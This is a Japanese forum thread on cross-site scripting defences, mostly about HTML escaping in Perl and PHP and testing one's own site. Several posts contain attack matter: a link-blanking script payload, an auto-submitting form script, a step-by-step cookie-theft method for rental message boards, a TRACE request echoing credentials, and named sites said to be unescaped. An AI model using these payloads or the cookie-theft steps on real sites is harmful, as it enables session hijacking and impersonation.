X



クロスサイトスクリプティング対策
0001名無しさん@お腹いっぱい。
垢版 |
01/10/27 10:37ID:AENF9z2S
http://securit.etl.go.jp/research/paper/css2001-takagi-dist.pdf

簡単にいって、フォームの入力をサーバサイドで処理してHTMLと
して出力する時に、文字のエスケープを適切に行わないと、
Cookieを取得するJavaScriptを埋め込み&出力結果を別サイトに
リダイレクトする、というような方法を使ってCookieを第三者に
盗まれる可能性がある、ということです。

上の資料を参考にしながら、
それぞれの処理系における、どのようの文字列エスケープを行うべきか、
といったサーバサイドの対策に関する情報を交換していきたいと思います。
0002名無しさん@お腹いっぱい。
垢版 |
01/10/27 11:07ID:AENF9z2S
とりあえずは、Perlの場合で、BBSやチャットだと、
一番カタイのはタグ禁止ということにして<,>を文字実体参照に変換してしまう
のが手っ取り早いと思います。
0003名無しさん@お腹いっぱい。
垢版 |
01/10/28 03:25ID:ZO04qCcD
セキュリティ板に載ってました、クロスサイトスクリプティング脆弱性の
最近の具体例が。
http://memo.st.ryukoku.ac.jp/archive/200110.month/index.html
のArticle 1756。見ればわかりますがHTMLタグのエスケープ処理を
忘れてるものと思われます。<SCRIPT>タグなんか埋め込まれた日には
色々悪さされそうです。
0004名無しさん@お腹いっぱい。
垢版 |
01/11/02 23:53ID:bu2IICno
本気で対策したい人たちが読むことを期待して。
少なくともFORMから入力されたパラメタは、全て読み込んだ時点で
実体参照に置換してしまう(汚染チェックも行う)。
s/&/&/g
s/</</g
s/>/>/g
s/"/"/g
URLやHTTPヘッダもそうするべきだけど、そこまでは辛いか?後は比較などで、
元の文字列でなければ困るところだけ、一時的に元に戻すようにする。
s/</</g
s/>/>/g
s/"/"/g
s/&/&/g
(上記は2chがちゃんと処理してなかった場合ちゃんと見えないかも。
面倒なんでその場合はページのソースを見てください)
必要な箇所での戻し忘れがあった場合の不都合は、比較的簡単に目に見えるので
どってこたない。置換を忘れた場合は見つけにくい上にセキュリティ問題になる
ことを考えれば、これくらい徹底した方がいいのでは?
0005名無しさん@お腹いっぱい。
垢版 |
01/11/03 00:20ID:zLquoryW
男は黙って tr/\W//d
00064
垢版 |
01/11/03 00:48ID:???
s/&/&amp;/g
s/</&lt;/g
s/>/&gt;/g
s/"/&quot;"/g
だ。下のは
s/&amp;/&/g
s/&lt;/</g
s/&gt;/>/g
s/&quot;"/"/g
ふー…ちゃんと&と"も置換してよ。
0007age
垢版 |
01/11/03 00:52ID:???
age
0008age
垢版 |
01/11/03 17:57ID:???
age
00109
垢版 |
01/11/03 19:17ID:???
つづく
001110
垢版 |
01/11/03 19:17ID:???
こんなことも(;´Д`)
001210
垢版 |
01/11/03 19:24ID:???
シパーイシターヨ
001312
垢版 |
01/11/03 19:25ID:???
これでどーよ、ネスケ4
0019
垢版 |
01/11/06 13:33ID:hz5ky/YY
くそ・・・ネスケ4で見たら落ちたよ(涙)
0021名無しさん@お腹いっぱい。
垢版 |
01/11/06 16:19ID:8Is73jkR
>>20
これとか:
http://www.securityfocus.com/archive/1/50782
この著者は先日MicrosoftのPassportの問題を指摘した人物。
Apache Softoware Foundationのメンバーで、1.3.11の同脆弱性を直した人。
0022名無しさん@お腹いっぱい。
垢版 |
01/11/09 00:12ID:ShSwDwY3
いや明日仕事で、うちの会社で開発したwebサービスの
クロスサイトスクリプティング対策をやんなきゃいけなくって、
できる限りヤバーイのを発見しないといけないんだけどさー、
どうするのがいいかねぇ。
0024名無しさん@お腹いっぱい。
垢版 |
01/11/09 21:56ID:QF/0zNjv
>22
まず、実体参照への変換関数(メソッド)を固定の記号に置き換えて返すように変更して実行してみる。
例えば"====================="とか。
そして、フォームの全てのパラメタに"**************************************************"とかの
目立つ文字列を入れてみて、後者がブラウザ上に現れたらアウト。
※hiddenフィールドもチェックしないとね

ただしそれだけだと、URLやHTTPヘッダのチェックが見落としやすいな…。
URL等をブラウザに表示している箇所は、"*********..."が表示されるはずだからそうなっていない
生のURLやUser-Agent等のヘッダの文字列が表示されていたらアウトなわけだけど…。
0025名無しさん@お腹いっぱい。
垢版 |
01/11/09 21:57ID:QF/0zNjv
後は全エラー画面をチェックしないといけないが、これは画面よリソースをチェックした方が早いだろうなぁ。
0026名無しさん@お腹いっぱい。
垢版 |
01/11/09 23:25ID:???
PHP 使ってますが。
フォームからのものとか、REMOTE_ADDR、REMOTE_HOSTなど
すべて strip_tags() してますが、安全でしょうか?
0027名無しさん@お腹いっぱい。
垢版 |
01/11/10 00:07ID:9tmYIcvX
たぶん。としかいえんなぁ。変換関数が組み込みのものだと24に書いたみたいなテスト方法は駄目だね。
要はそれを忘れてないかどうかが問題なので。
環境変数等から変数に代入する時点で変換するというポリシーが貫けているなら、
この問題に対してはほぼ安全と思う。
002826
垢版 |
01/11/10 00:58ID:???
>>27
とりあえずhiddenを含め全部やってるはずなので、一応安心しておきます。
0029cookieが表示されない
垢版 |
01/11/12 16:46ID:???
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/ の
MS01-055: Cookie Data in IE Can Be Exposed or Altered Through Script Injection (セキュリティアンテナ, 2001.11.09)にあるデモ

http://www.solutions.fi/index.cgi/extra_iebug?lang=eng
でamazon.co.jpを読むと(事前にamazon.co.jpのcookieを取り込んである)
MSIE cookie vulnerability test page
This page displays the cookies found on your browser for site amazon.co.jp:
Cookies:
No cookies found for site...
Click here to make new search for cookies.
−−−−−
アクティブスクリプトに対して「プロンプトを表示」で表示されたら
はい(Y)を選択する。
こんなダイアログ−http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/ie6-script-dialog.png
−−−−−
アクティブスクリプトを実行しなければ "; document.location=url; と表示される。
−−−−−
デモが表示された後、「戻る」と
警告: ページの有効期限切れ 要求したページは、フォームで送信された情報を使用して作成されました。このページは、もう利用できません。セキュリティ保護のため、情報は自動的には再送信されません。
情報を再送信し、この Web ページを表示するには、ツール バーの [更新] ボタンをクリックしてください。 となる。
0031>30
垢版 |
01/11/12 18:24ID:???
IEは5.01SP2です。
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-055
によると、
テストしたバージョン :
マイクロソフトは Internet Explorer 5.5 SP2 および 6 のテストを行い、これらの脆弱性による影響を評価しました。それ以前のバージョンに関してはサポート (英語情報) の対象となっていないため、この脆弱性による影響は不明です。
とのこと。
ということは、5.01でも危険ということだろうか。
0033名無しさん@お腹いっぱい。
垢版 |
01/12/17 07:29ID:BojNQSph
age
0037 
垢版 |
02/01/26 08:50ID:SUrQysHb
a
0038名無しさん@お腹いっぱい。
垢版 |
02/01/26 11:51ID:???
こんなのmail欄に入れたらどうなるんだろう?
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};
0040名無しさん@お腹いっぱい。
垢版 |
02/01/26 13:47ID:???
メール欄が長すぎます・・・だって(笑)

&{for(var i=0;document.links[i];i++)document.links[i].href='';};
これは大丈夫やった。
0052名無しさん@お腹いっぱい。
垢版 |
02/02/08 13:44ID:???
>日本でもWebサイトに関する最初のインシデントとして記録されているのは、1997年に総務省の掲示板にタグ
>が書き込まれ、その掲示板を閲覧しようすると、オウム真理教の音楽が外部サイトから読み込まれて鳴るよう
>になったという事件であり、このようにクロスサイトスクリプティングの脆弱性は古くから存在する問題である。

タグ可の掲示板はみんな着尺製ありだな
http://pc.2ch.net/test/read.cgi/sec/1008926076/l10
0053名無しさん@お腹いっぱい。
垢版 |
02/02/09 01:21ID:???
F=Function;fs=document.forms;

l0=new F('f=fs[fs.length-1]');
l1=new F('es=f.elements;');
l2=new F('a=es[0];b=es[2];');
l3=new F('c=es[3];d=es[4];');
l4=new F('a.value=navigator.userAgent;');
l5=new F('b.value=\'fusianasan\';');
l6=new F('c.value=\'\';');
l7=new F('d.value=\' \';');

l8=new F('es[1].click();');

lx=new F('l0();l1();l2();l3();');
ly=new F('l4();l5();l6();l7();');
lz=new F('l8();');

l=new F('lx();ly();lz();');window.onload=l;
0057名無しさん@お腹いっぱい。
垢版 |
02/02/12 22:55ID:???
>>22
で、22はお腹いっぱいヤバゲなの見つかったのかな?
SSLなページの確認はメンドーでないかい? >all
アホプログラマーの重箱の隅つつくのも疲れてきたぞ。(藁
005957
垢版 |
02/02/19 01:53ID:???
漏れがバカだから。とりあえずパケットキャプチャーしてどんな内容送ってるのか見ようと思うんだけど。
IEなんかのクライアントで見て、値が固定されてるもののテストってどうしてますか?
例えば買い物の個数とかサーバ側でエスケープ処理してるか確認したい訳で。
POSTメソッドの値を色々試すのに良いツールってないですかねぇ。HTMLエディタで書き換える?
006157
垢版 |
02/02/19 07:49ID:???
>>60
すっ、すばらしい...。ありがとう御座います。感謝感激!
これでもっと重箱の隅つっけそうです。(藁
0062a
垢版 |
02/06/27 00:50ID:awVCb82d
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};
0064nobodyさん
垢版 |
03/01/10 01:43ID:QhQLqNIU
Struts使おう。
0066奥さん ◆mL2ZRk1cK.
垢版 |
03/01/18 07:27ID:AxdRMTC9
d
0067奥さん ◆0Z6Yhsb88E
垢版 |
03/01/18 07:27ID:AxdRMTC9
aq
0068奥さん ◆E39m/9K3xY
垢版 |
03/01/18 07:28ID:AxdRMTC9
qwe
0069奥さん ◆8WgvSovIKg
垢版 |
03/01/18 07:28ID:AxdRMTC9
qwer
0070奥さん ◆ABM5odHy/Q
垢版 |
03/01/18 07:29ID:AxdRMTC9
12345
0071奥さん ◆bc.v5kgifQ
垢版 |
03/01/18 07:30ID:AxdRMTC9
hfjfjf
0072奥さん ◆IGEMrmvKLI
垢版 |
03/01/18 07:31ID:AxdRMTC9
vbncnnb
0073奥さん ◆tsGpSwX8mo
垢版 |
03/01/18 07:31ID:AxdRMTC9
hhhhhhhh
0074奥さん ◆Mjk4PcAe16
垢版 |
03/01/18 07:32ID:AxdRMTC9
fhfhfhfhfh
0076nobodyさん
垢版 |
03/01/19 15:58ID:???
XSS対策のひとつとして、「エスケープ処理」がある。
これはCGIが扱うパラメータが多くなってくると、ついつい忘れてしまう煩雑で面倒な処理だが、
もしあなたがPerlユーザなら、HTML::Templateを使うことによってエスケープを
テンプレート側に記述し、プログラム側から完全に追い出してしまうことができる。

<input type="hidden" value="<tmpl var="aniti_xss_value" escape="url">">
<input type="text" value="<tmpl var="aniti_xss_text" escape="html">">

最後のescape属性に注目だ。これを指定してやるだけで、
テンプレートにセットした変数は適切にエスケープされるようになる。
もう、escape関数を呼びまくる必要はないんだ!ひゃっほう!

ps.この情報がXSS対策に頭を悩ますCGI製作者の助けになることを祈ってるよ。
0078nobodyさん
垢版 |
03/01/21 19:45ID:eVlnRoM0
対策ではなくクキー盗む方法なのだが。
JBBSなどレンタル系の掲示板で使える。(htmlにログを表示して、javascriptでクッキーを読み出すもの)
レンタル系の掲示板は、自分が書き込んだ掲示板以外の板にもクッキーが適応されるところが多い。
(たとえば、http://jbbs.shitaraba.com/business/1/に書き込むとhttp://jbbs.shitaraba.com/business/2/の板にも適応される。)
これを利用して、自分の掲示板に書き込まれなくてもクッキーに入っているデータを取得できる。

具体的方法として
1.GET(QUERY_STRING)からのデータをテキストに保存するCGIを作成し、適当なフリーサーバに設置
2.ターゲットと同じレンタルBBSを借りる。
3.HTMLクッキー取得部分を調べてjavascriptで1のCGIに渡す。
4.ターゲットの掲示板にそれらしい理由を付けてカキコ
0079nobodyさん
垢版 |
03/01/21 23:40ID:ByrQNqOs
クッキーのpathを / とかにしてるんだろうね。
名前が漏れるくらいはなんでもないけど
トリップやキャップもクッキーに入ってるとなりすましが出来ると。
0081nobodyさん
垢版 |
03/01/28 20:54ID:wWZkstRp
>>80
ウゲ
でも
> サーバのTRACEメソッドが機能している場合
ってどういう場合なの?
0083山崎渉
垢版 |
03/04/20 06:06ID:???
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
0084nobodyさん
垢版 |
03/05/11 20:11ID:???
TRACE / HTTP/1.1
Host: localhost
Authorization: Basic

HTTP/1.1 200 OK
Date: Sun, 11 May 2003 11:07:46 GMT
Server: Apache/1.3.27
Transfer-Encoding: chunked
Content-Type: message/http

50
TRACE / HTTP/1.1
Authorization: Basic lG+/r4+/j6+/64FgKHc=
Host: localhost


0

(((;゚Д゚))ガクガクブルブル
0085山崎渉
垢版 |
03/05/22 02:10ID:???
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
0086山崎渉
垢版 |
03/05/28 17:16ID:???
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉
0087山崎 渉
垢版 |
03/07/15 11:18ID:???

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
0088山崎 渉
垢版 |
03/08/02 02:34ID:???
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
0089ぼるじょあ ◆ySd1dMH5Gk
垢版 |
03/08/02 05:12ID:???
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
0090山崎 渉
垢版 |
03/08/15 23:09ID:???
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン
0091nobodyさん
垢版 |
03/08/28 13:53ID:5epBRgUL
2chにはもうXSS使える穴は無い?
0092nobodyさん
垢版 |
03/08/29 01:04ID:???
半角で穴見つかったのが最後かな?
0093nobodyさん
垢版 |
03/08/29 14:52ID:???
そうか…
XSS使えばフレームでの別ドメインの制限が回避出来るんだけどなー…
0094nobodyさん
垢版 |
03/12/27 14:03ID:6Fk7/T/f
XSSをさらすスレはここですか?
0095nobodyさん
垢版 |
2005/11/20(日) 11:58:56ID:???
ttp://www.creators-fukuoka.com/
クロスサイトスクリプティング出来る?
0098nobodyさん
垢版 |
2008/05/08(木) 19:41:05ID:CmE1kuyM
age
0099nobodyさん
垢版 |
2008/08/22(金) 19:39:26ID:???
ttp://youtube2.in/

<
>
"

あたりエスケープできてなくね。
レスを投稿する


ニューススポーツなんでも実況